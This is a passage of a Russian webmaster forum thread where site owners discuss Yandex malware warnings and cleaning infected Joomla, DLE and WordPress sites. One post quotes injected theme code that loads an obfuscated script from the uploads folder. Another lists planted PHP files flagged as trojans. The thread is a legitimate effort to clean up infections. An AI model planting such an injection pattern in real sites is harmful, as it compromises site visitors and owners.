Яндекс нашел вирус на сайте

draff
На сайте с 30.03.2010
Offline
65
#291

AAAAllleex,

И на Джумла такие скрипты. Какой хостинг? netangels ?

video.php- это шелл был ?

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
R
На сайте с 24.01.2008
Offline
180
#292
LenkaAOE:
у меня тоже самое. До этого три дня яша проверял сайт нормально, но все еще находил вирус, насовали в ДЛЕ немеряно дряни, пока вычистила 3 перепроверки и прошло, а 4-ю все...как сглазали..не удалась пернепроверка и всё.

Напишите у кого такое было..как долго не мог перепроверить и платоны отписали ли кому-то о причинах?

Значит при проверке 4 раза не все удалили или вам опять напихали всяких вредоносных скриптов.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
A
На сайте с 29.04.2013
Offline
22
#293
draff:
AAAAllleex,
И на Джумла такие скрипты. Какой хостинг? netangels ?

jino.ru.

draff:

video.php- это шелл был ?

Хз.

N
На сайте с 22.02.2013
Offline
7
#294

Беда с троянами на блоге с движком WP, в один из файлов php темы вставляется что-то типа <script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/switch.js"></script><script type="text/javascript">

document.write("<scr"+"ipt src='/wp-content/uploads/2011/07/fermin.js'><"+"/script>");

</script>, а в папках из каталога uploads возникают файлы sfw и js с произвольным именем. Чищу код, удаляю файлы, а они снова появляются, снова меняют код в файлах темы, бьюсь уже два месяца. Может кто-нибудь подскажет как троян вытравить с блога.

draff
На сайте с 30.03.2010
Offline
65
#295

nelgun,

Пока не найдешь шелл, яваскрипты и .swf будут появляться.

Шелл загружается с массива $_POST

K5
На сайте с 21.07.2010
Offline
209
#296

nelgun, ай-болит в помощь

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
R
На сайте с 24.01.2008
Offline
180
#297
nelgun:
Беда с троянами на блоге с движком WP, в один из файлов php темы вставляется что-то типа <script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/switch.js"></script><script type="text/javascript">
document.write("<scr"+"ipt src='/wp-content/uploads/2011/07/fermin.js'><"+"/script>");
</script>, а в папках из каталога uploads возникают файлы sfw и js с произвольным именем. Чищу код, удаляю файлы, а они снова появляются, снова меняют код в файлах темы, бьюсь уже два месяца. Может кто-нибудь подскажет как троян вытравить с блога.

На вряд ли получится тут просто указать, где что лежит, нужно проверять весь код вашего сайта, не рекомендую использовать сканеры ищут максимум самое популярно.

N
На сайте с 22.02.2013
Offline
7
#298

Всем спасибо за ответы, запустил по совету Ай-болит, может ли эта гадость сидеть в плагинах?

/wp-content/plugins/nofollow-free/lang/lang-pl.php

; w komentarzu, ponownie w***322;***261;czy si***281; nofollow - dla ochrony przed |spamerami."); define("_SETNUMCOM","Czy chcesz, by przy nickach komentuj***261;cy

/wp-content/plugins/antispam-bee/js/dashboard.min.js

ity":0.8}).hide(),k,a=0,y=q.length;a<y;a++){var f=Math.round(120-u*b[a]),g=Math.|round(0+e*(a+0.5));a||(k=["M",g,f,"C",g,f]);if(a&&a<y-1){var h=Math.round(120-u

wp-content/plugins/contextual-related-posts/timthumb/timthumb.php

image that says 'no hotlinkers' // nothing to worry about! :) $imgData = |base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0

K5
На сайте с 21.07.2010
Offline
209
#299

гадость может быть где угодно, ай-болит тоже надо осторожно использовать, код сравните с оригиналом из офф. репозиротия

A
На сайте с 29.04.2013
Offline
22
#300

Файл (или файлы) на вашем сайте http://pravogroup.ru были изменены. Пожалуйста, просмотрите отчет ниже, чтобы проверить изменения не являются ли они результатом атаки.

Время сканирования: Sunday, December 8th 2:52 pm UTC

Добавленные файлы: 3

Удаленные файлы: 0

Измененные файлы: 2

Memory Used: 4.94 MB

Добавленные файлы

Файл Измененные Хеш файла

1. wp-includes/js/plupload/plupload.flash.php Sunday December 8th, 2013 at 2:04 pm UTC 46066571214578db67750b84090d9b7d

2. wp-includes/js/jquery/jquery.php Sunday December 8th, 2013 at 2:04 pm UTC f76f3256b8f9dac0651e05d985e1ddbc

3. wp-includes/css/wp-auth-check.min.php Sunday December 8th, 2013 at 2:04 pm UTC fe76c0ee352ef98cea6722333edde863

Про 2 и 3 Avast пишет: Угроза:PHP: Decode-Y[Trj]

Подозрительные файлы в приложении.

zip wp-includes.zip

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий